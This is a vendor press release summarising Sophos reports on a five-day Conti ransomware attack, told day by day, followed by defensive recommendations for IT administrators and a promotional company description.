Five days in close contact with Conti ransomware: Sophos describes in three reports in detail the procedure of a real Conti ransomware attack and how it was stopped. Also included: attack behavior, technical background and practical tips for IT administrators.
Conti ransomware attacks, which have increasingly been up to mischief since the middle of last year, are an impressive example of how cybercriminals use modern and sophisticated technology to plan their attack in a targeted manner and thus greatly improve their chances of successfully penetrating corporate networks. In three detailed reports, the Sophos Rapid Response team describes a real attack and how it unfolded over five days: "This was a very rapid and potentially devastating attack," says Peter Mackenzie, manager of Sophos Rapid Response. “During our forensic investigation, we saw that the attackers exploited vulnerabilities in the firewall to compromise the network and gain access to domain administration data in just 16 minutes. After that, the attackers deployed Cobalt Strike Agents on the servers that would form the backbone of the ransomware attack.”
Cyber attackers live on the keyboard
The special thing about this attack was that the cyber criminals controlled it themselves and did not leave everything to an automated routine. In these man-made attacks, the attackers can adapt and react to changed situations in real time. Thanks to such flexibility, these attacks have a higher chance of success and victims cannot feel safe just because an initial attack attempt has been discovered and thwarted. Because then what happens in the following diary of a real Conti ransomware attack happens - fortunately in this case with a happy ending.
Attack day 1
The attackers penetrated the firewall and needed only 16 minutes to hijack the admin account on two of the victim's servers. They then use a Cobalt Strike Agent on the first server until this attack is discovered and stopped by the victim. Just 15 minutes later, the attackers repeat their action on the second server, and the attack goes unnoticed. Once their foot in the door, the attackers set off on a “crawl” journey through the victim's company network and infected a third server.
Attack day 2
No attack activity is noticed by the victim.
Attack day 3
The attackers spend around ten hours looking around for file folders with potentially interesting information and extract them with the help of the legitimate open source management tool RClone, which was installed unnoticed on the third hijacked server. Among other things, data from the finance, HR and IT departments are affected.
Attack day 4
The attackers use the knowledge they have gathered about the endpoint and server structure from day 1 and first install a Cobalt Strike Agent on a fourth server to test the ransomware. After the success message, they install Cobalt Strike on almost 300 devices and start the Conti ransomware after another 40 minutes. The compromised endpoints load the code from various Command & Control addresses and execute it. The perfidious thing about it: No data is written to the hard drives, but the ransomware is executed directly in the main memory to avoid detection. As a result, the ransomware tries to encrypt data for three hours, but is blocked on the computers protected with Sophos Intercept X despite the obfuscation tactic. The attacked company now cuts the Internet connection with the exception of the Sophos application, shuts down the critical infrastructure and stops work processes. The Sophos Rapid Response team is called in, identifies the infected endpoints and servers, stops the various attack processes and begins to restore compromised areas.
Attack day 5
During their final research, the Rapid Response task force identifies a second, potential data exfiltration, a second compromised account and suspicious RDP (Remote Desktop Protocol) traffic through the vulnerable firewall. At the same time, the victim restores the unsecured endpoints and powers up the critical infrastructure.
The moral of the story
It is often the IT administrators who are in the direct line of fire in the event of a ransomware attack. They are the ones who come to work in the morning and find everything encrypted including a ransom note. Based on the experience of its Rapid Response team, Sophos has developed an action list to help you cope with the challenging first few hours and the following days of a ransomware attack.
- Turning off Remote Desktop Protocol (RDP) to the Internet to prevent cybercriminals from accessing networks.
- If access to RDP is absolutely necessary, it should be secured via a VPN connection.
- Multi-layered security measures - including EDR functions (Endpoint Detection and Response) and managed response teams for 24/7 monitoring of the networks - prevent attacks and make a significant contribution to the protection and detection of cyber attacks.
- Constant monitoring of known leading indicators that often precede ransomware attacks.
- Creation of an incident response plan, which should be continuously updated with changes in the IT infrastructure and the company.
- External experts with a lot of experience can offer excellent assistance here.
Three Conti ransomware reports from Sophos
In the three reports from Sophos, the Conti ransomware attack is described from different perspectives and specific instructions are given in the event of an attack. The English-language reports can be downloaded from the following links:
Timing of a Conti ransomware attack:
A Conti Ransomware Attack Day-by-Day
Technical description of the SophosLabs on the evasive nature of Conti ransomware:
Conti Ransomware: Evasive by Nature
Instructions including a 12-point checklist for IT administrators to cope with an attack:
What to Expect When You've Been Hit with Conti Ransomware
More on this at Sophos.com
About Sophos More than 100 million users in 150 countries trust Sophos. We offer the best protection against complex IT threats and data loss. Our comprehensive security solutions are easy to deploy, use and manage. They offer the lowest total cost of ownership in the industry. Sophos offers award-winning encryption solutions, security solutions for endpoints, networks, mobile devices, email and the web. In addition, there is support from SophosLabs, our worldwide network of our own analysis centers. The Sophos headquarters are in Boston, USA and Oxford, UK.